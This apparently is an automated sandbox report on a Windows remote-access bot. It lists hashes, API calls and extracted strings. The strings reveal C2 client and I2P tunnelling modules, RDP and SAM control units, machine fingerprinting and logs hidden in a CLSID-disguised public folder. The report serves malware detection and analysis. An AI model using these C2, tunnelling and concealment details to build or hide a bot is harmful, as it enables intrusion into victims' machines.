                    • String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
                    • API String ID: 3828489143-3798070276
                    • Opcode ID: a1b5e51bd6410f3c83cdfc6e219792161668188f7e39e64117da69d6b01f4c97
                    • Instruction ID: 0dc005fbc2ef7a2b73d71beacf92cdcd9264e75e5675e43bac14173969b0c8b8
                    • Opcode Fuzzy Hash: a1b5e51bd6410f3c83cdfc6e219792161668188f7e39e64117da69d6b01f4c97
                    • Instruction Fuzzy Hash: 3ED12D21D3D65281FA20EB14EC80FB9EA70AF40B54FD54032C94E576E5DF2DECA487A9

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID:
                    • String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$TGER$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$h$ip-api.com$last-patch$mem_alloc$referrer
                    • API String ID: 0-3139374006
                    • Opcode ID: a59f30150775796cf729d42dacd5df686f13eafd5d338df122460e0b1b621434
                    • Instruction ID: fad7b1b2de246126d52592ebaaa2794690377ae170ecaacc6295d77309f1d893
                    • Opcode Fuzzy Hash: a59f30150775796cf729d42dacd5df686f13eafd5d338df122460e0b1b621434
                    • Instruction Fuzzy Hash: 3F124C72A0C68286EB608B9DE4803B9B7A0EB887D4F544235DB9D477E6DF7CE554CB00

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strlen$strcat$HandleLibraryLoadModule
                    • String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
                    • API String ID: 1893813203-492052463
                    • Opcode ID: ca066c6045d2f2a4322d3373cf1fe784a61079aaa6ce0be1ffd8e7fa4d20b0cc
                    • Instruction ID: 105556b51660528c26000f71e2e3f01d013de8393248e407d63bcaaaab8658c6
                    • Opcode Fuzzy Hash: ca066c6045d2f2a4322d3373cf1fe784a61079aaa6ce0be1ffd8e7fa4d20b0cc
                    • Instruction Fuzzy Hash: 3B719C31A1DB8392EB219B99E4803FA6395EB887C0F845131DB4D4BB9AEF3CD905C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
                    • API String ID: 3395718042-2859552336
                    • Opcode ID: 27ea5ecb8930a5d572a67ee6d818b6b1525ff907abdc708875468967654232a4
                    • Instruction ID: 2bdc8611c17d197b602f3bddae61beebac0a91e13cdcc8640771f7311e5a3bda
                    • Opcode Fuzzy Hash: 27ea5ecb8930a5d572a67ee6d818b6b1525ff907abdc708875468967654232a4
                    • Instruction Fuzzy Hash: FE514012E1C707A2FA206BDDA8A43BC7352AF557C4F584032CB0D46BA2DEADB956C341
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
                    • API String ID: 3395718042-315528054
                    • Opcode ID: 602e9c047fdca86cbadb0e5c23cdcfb60371812318e93288b996e6c907137449
                    • Instruction ID: f429e8a65ea131e304848889b0689bfcdaa34c7f643bb8ab0c88b0ac273ec320
                    • Opcode Fuzzy Hash: 602e9c047fdca86cbadb0e5c23cdcfb60371812318e93288b996e6c907137449
                    • Instruction Fuzzy Hash: 3E514960E1E70386FB649BDDE8903F82354AF897C4F548032DB4E466A7DE6CA996C341

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
                    • API String ID: 3395718042-1297835036
                    • Opcode ID: 1150151ec345bf13c3b31c0e9be5a53ea1ef8a6f05555bc19399344b667da666
                    • Instruction ID: e442ea59e8dc304b59acd59e54db474d07a9e0df6202cd59620257942e7cc784
                    • Opcode Fuzzy Hash: 1150151ec345bf13c3b31c0e9be5a53ea1ef8a6f05555bc19399344b667da666
                    • Instruction Fuzzy Hash: 10517050E1C7D385FA229F0DB8A03B81255AF467C4F958432DB0E5A6D2DEACF946F341
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
                    • API String ID: 3395718042-190452282
                    • Opcode ID: 812d47fff8b64de28eadb4b284417ff33b11a0d1b38bd8777733dc5e58d56bcb
                    • Instruction ID: 5cc94355ab67ef999a51a796717c92ce8426d050c0503c75da9e02fc1efa18ab
                    • Opcode Fuzzy Hash: 812d47fff8b64de28eadb4b284417ff33b11a0d1b38bd8777733dc5e58d56bcb
                    • Instruction Fuzzy Hash: EF516C51A0CA1795FA289BDCA8873B89394AF057CCF407132CF4E466A3DE6DB94A9301

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmp
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
                    • API String ID: 3395718042-2735303109
                    • Opcode ID: b880186cb09fe9418d3488624d1c28ca1e4f32ba72a4e66950c71ccbecef1740
                    • Instruction ID: bd1cf26413e85b095482649eefaab0330385fecad357a035b070aad4dcf00b4b
                    • Opcode Fuzzy Hash: b880186cb09fe9418d3488624d1c28ca1e4f32ba72a4e66950c71ccbecef1740
                    • Instruction Fuzzy Hash: 18511A60E0C603C6FA6097DDACD03BA1294BF177C4F9440B7DF0E4A6A2DE6DAB458742

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
                    • API String ID: 3395718042-1794035234
                    • Opcode ID: 8b2556d2579fb226d3b412aa444ad6ae0953bae4d5ef3f896a350effe941be9c
                    • Instruction ID: ace710477b1c52a3946b0cc539d886116048bd28471fdfb5dc040c43a8f0adef
                    • Opcode Fuzzy Hash: 8b2556d2579fb226d3b412aa444ad6ae0953bae4d5ef3f896a350effe941be9c
                    • Instruction Fuzzy Hash: 5A516092E0C7C381FA609F5DA8C03B91355AF067D4F9A8432DB4E06297DE6DA946F341
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    • API String ID: 1980715187-354652506
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: CreateErrorLastThread
                    • String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
                    • API String ID: 1689873465-2891999747
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: _errno$fclosefopenfwrite
                    • String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                    • API String ID: 608220805-961576452
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                    • API String ID: 1104438493-906809513
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                    • API String ID: 1104438493-906809513
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
                    • String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
                    • API String ID: 3216678114-1460613360
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
                    • String ID: %TEMP%$(package != NULL)$(target != NULL)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
                    • API String ID: 3066828623-625159688
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
                    • String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
                    • API String ID: 548194777-214984806
                    APIs
                    • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001B9FFF913D0,?,00007FF7088884F0,00007FF7088784E9), ref: 00007FF708873DD9
                    • LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001B9FFF913D0,?,00007FF7088884F0,00007FF7088784E9), ref: 00007FF708873E12
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001B9FFF913D0,?,00007FF7088884F0,00007FF7088784E9), ref: 00007FF708873EE7
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001B9FFF913D0,?,00007FF7088884F0,00007FF7088784E9), ref: 00007FF708873FCC
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001B9FFF913D0,?,00007FF7088884F0,00007FF7088784E9), ref: 00007FF708874140
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleLock
